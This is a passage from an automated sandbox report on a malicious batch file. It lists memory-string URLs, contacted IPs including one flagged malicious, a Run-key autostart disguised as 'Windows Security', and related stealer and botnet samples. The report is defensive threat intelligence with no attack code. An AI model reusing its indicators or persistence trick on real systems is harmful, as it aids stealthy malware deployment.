00000014.00000003.2675364813.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2690894995.00000000016D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/synaptics.exe, 00000014.00000003.2675863176.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2689040173.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672783950.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2678476168.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2674661778.0000000001949000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2703833361.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2723906148.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2673059885.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2687512306.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2682178089.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2671110279.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742396700.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601056030.000000000192A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2609858470.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599185163.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2618104210.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2623557464.0000000001934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.iana.org/assignments/media-typessynaptics.exe, 00000014.00000003.2623323333.0000000001545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.python.org/synaptics.exe, 00000014.00000003.2516955463.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2564567996.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601360761.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521322653.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518928174.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521200941.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2569213339.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2519552085.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2516039697.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2533673642.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2529041976.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2607817795.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2531202744.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548822658.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2545729196.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543956442.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2524312967.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518549794.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://json.orgsynaptics.exe, 00000014.00000003.2608627922.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599655096.0000000000AF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallestsynaptics.exe, 00000014.00000003.2622193539.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://domain.tld/path/to/resourcesynaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.python.org/dev/peps/pep-0205/synaptics.exe, 00000014.00000003.2588777958.0000000001932000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2589648322.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2565759692.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594703243.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11synaptics.exe, 00000014.00000003.2639516326.00000000018F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://bugs.python.org/synaptics.exe, 00000014.00000003.2546396130.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548543308.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://twitter.com/synaptics.exe, 00000014.00000003.2691596913.0000000003939000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684125738.0000000001BB1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://google.com/synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2691397567.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/openssl/openssl/issues/14579synaptics.exe, 00000014.00000003.2608349950.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://google.com/mail/synaptics.exe, 00000014.00000003.2613750411.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://google.com/mail/synaptics.exe, 00000014.00000003.2616420842.0000000003818000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2613750411.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://github.com/urllib3/urllib3/issues/3290synaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2730254084.000000000190E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2718070490.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2725817031.000000000190D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663690600.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2634063079.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2653018334.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658366203.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2639516326.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2744411023.000000000190E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.htmlsynaptics.exe, 00000014.00000003.2512844280.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2514719540.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://bugs.python.org/issue874900synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601056030.000000000192A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2647268662.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2609858470.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2666415324.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2723906148.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663690600.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599185163.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2676220591.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2618104210.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658366203.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2623557464.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652761780.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2634063079.0000000001931000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2639516326.000000000190F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://bugs.python.org/issue31672synaptics.exe, 00000014.00000003.2527331333.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2531202744.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2529041976.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2527110727.0000000000B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://github.com/urllib3/urllib3/issues/3020)synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    42.96.10.8
                                                                                                                                                                                    unknownViet Nam
                                                                                                                                                                                    4249LILLY-ASUStrue
                                                                                                                                                                                    208.95.112.1
                                                                                                                                                                                    ip-api.comUnited States
                                                                                                                                                                                    53334TUT-ASUSfalse
                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                    142.250.184.228
                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    IP
                                                                                                                                                                                    127.0.0.1
                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1555120
                                                                                                                                                                                    Start date and time:2024-11-13 13:24:10 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 13m 20s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:46
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:x.bat
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winBAT@88/1792@20/5
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .bat
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.185.110, 108.177.15.84, 34.104.35.123, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.185.206, 13.107.6.158, 40.126.32.140, 40.126.32.133, 40.126.32.138, 20.190.160.22, 40.126.32.136, 20.190.160.20, 40.126.32.134, 40.126.32.68, 142.250.184.227, 172.217.18.14, 66.102.1.84, 142.250.181.227, 142.250.184.234, 142.250.186.106, 142.250.186.74, 142.250.185.202, 142.250.185.234, 142.250.185.74, 142.250.186.170, 142.250.185.138, 172.217.23.106, 216.58.206.74, 216.58.206.42, 172.217.18.106, 172.217.16.202, 142.250.185.106, 142.250.185.170, 216.58.212.138, 216.58.206.67, 64.233.167.84, 142.250.186.78
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, ogads-pa.googleapis.com, www-msn-com.a-0003.a-msedge.net, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, l-0007.config.skype.com, business.bing.com, clients.l.google.com, dual-a-0036.a-msedge.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: x.bat
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    07:25:12API Interceptor98x Sleep call for process: powershell.exe modified
                                                                                                                                                                                    12:26:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Security C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk
                                                                                                                                                                                    12:26:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Security C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    208.95.112.1nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    INV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    Halkbank_Ekstre.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                    • ip-api.com/json
                                                                                                                                                                                    Sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    IgTdifcj7HukYrd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    Orden de Compra No. 434565344657.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                    Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • ip-api.com/line/
                                                                                                                                                                                    Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • ip-api.com/line/
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    chrome.cloudflare-dns.comXeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    Xeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    dyT8pWNPk7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                    play.google.comEditLoc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 172.253.124.102
                                                                                                                                                                                    https://wmrc.titurimplec.com/HA02SW/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 172.217.18.14
                                                                                                                                                                                    http://www.chanderbhushan.com/doc.php.Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.184.238
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 172.217.18.14
                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.185.142
                                                                                                                                                                                    https://sites.google.com/lecollectivem.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.185.206
                                                                                                                                                                                    https://oqumcrpv8e.beefreecontent.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 142.250.185.110
                                                                                                                                                                                    specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    plus.l.google.comEditLoc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 142.250.9.138
                                                                                                                                                                                    https://wmrc.titurimplec.com/HA02SW/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.186.174
                                                                                                                                                                                    http://www.chanderbhushan.com/doc.php.Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.184.206
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 142.250.185.206
                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 142.250.186.110
                                                                                                                                                                                    https://sites.google.com/lecollectivem.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 142.250.184.206
                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 142.250.186.78
                                                                                                                                                                                    specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 142.250.184.206
                                                                                                                                                                                    https://sites.google.com/worth.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 216.58.206.46
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                    • 142.250.181.238
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    LILLY-ASUSnK1cgEhvAP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 40.208.145.71
                                                                                                                                                                                    nK1cgEhvAP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 40.224.185.98
                                                                                                                                                                                    yakuza.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 40.172.157.47
                                                                                                                                                                                    meerkat.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                    • 43.210.113.136
                                                                                                                                                                                    meerkat.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                    • 42.137.239.165
                                                                                                                                                                                    http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUM1RXUzBHU1RDUjlQOFBPUUE4QVRaS0pPSC4uGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 43.157.144.191
                                                                                                                                                                                    botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                    • 43.106.87.33
                                                                                                                                                                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                    • 42.173.182.18
                                                                                                                                                                                    amen.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                    • 43.184.48.210
                                                                                                                                                                                    amen.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                    • 42.69.211.210
                                                                                                                                                                                    TUT-ASUSnuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    INV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    Halkbank_Ekstre.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    Sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    IgTdifcj7HukYrd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    Orden de Compra No. 434565344657.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                    No context
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_bz2.pydhttps://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                      SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          SecuriteInfo.com.Win32.Patched.29806.7109.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            electrum-4.5.3-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              electrum-4.5.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_asyncio.pydhttps://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                  SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      SecuriteInfo.com.Win32.Patched.29806.7109.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        electrum-4.5.3-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          electrum-4.5.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8319
                                                                                                                                                                                                            Entropy (8bit):5.796162038089215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:fsNAZyeeiRUHVQCkVSkf6qRAq1k8SPxVLZ7VTiQ:fsNAsEYqBVb6q3QxVNZTiQ
                                                                                                                                                                                                            MD5:B1A2AF11830CC436232CC7BA159DCA71
                                                                                                                                                                                                            SHA1:DC445EAD929D23CE0DFB73F5F0D21C37B7E1EFC1
